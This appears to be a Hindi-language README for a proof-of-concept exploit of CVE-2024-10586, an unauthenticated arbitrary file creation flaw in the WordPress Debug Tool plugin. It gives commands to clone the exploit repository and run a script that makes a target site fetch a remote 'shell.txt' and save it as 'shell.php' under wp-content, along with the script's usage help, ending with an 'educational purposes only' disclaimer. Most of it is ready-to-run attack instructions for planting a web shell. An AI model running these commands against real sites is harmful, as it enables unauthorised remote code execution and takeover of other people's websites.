
WordPress Debug Tool प्लगइन को लक्षित करने वाले CVE-2024-10586 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। बिना प्रमाणीकरण के POST अनुरोधों के माध्यम से रिमोट कोड निष्पादन की ओर ले जाने वाले मनमाने फ़ाइल अपलोड को स्वचालित करता है।
विवरण
वर्डप्रेस के लिए डिबग टूल प्लगइन विभिन्न संस्करणों में, 2.2 तक (सम्मिलित), dbt_pull_image() फ़ंक्शन पर क्षमता जाँच की कमी और फ़ाइल प्रकार सत्यापन की कमी के कारण मनमानी फ़ाइल निर्माण के प्रति संवेदनशील है।
यह बिना प्रमाणीकरण वाले हमलावरों को .php जैसी मनमानी फ़ाइलें बनाने में सक्षम बनाता है, जिनका उपयोग रिमोट कोड निष्पादन के लिए किया जा सकता है।
CVE-2024-10586
git clone https://github.com/Nxploited/CVE-2024-10586-Poc
cd CVE-2024-10586-Poc
निम्न कमांड के साथ स्क्रिप्ट चलाएँ: python CVE-2024-10586.py -u -r -p
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
python CVE-2024-10586.py -u http://192.168.100.74/wordpress -r http://192.168.100.74/shell.txt -p /opt/lampp/htdocs/wordpress/wp-content/shell.php
usage: CVE-2024-10586.py [-h] -u URL -r REMOTE [-p PATH]
Send a POST request to WordPress admin-ajax.php.
options:
-h, --help show this help message and exit
-u URL, --url URL The base URL of the WordPress site.
-r REMOTE, --remote REMOTE
The remote URL to use in the 'source' parameter.
-p PATH, --path PATH The file path to use in the 'missed' parameter. Defaults to '/opt/lampp/htdocs/wordpress/wp-content/Nxploit.php'.
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है। लेखक इस टूल के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।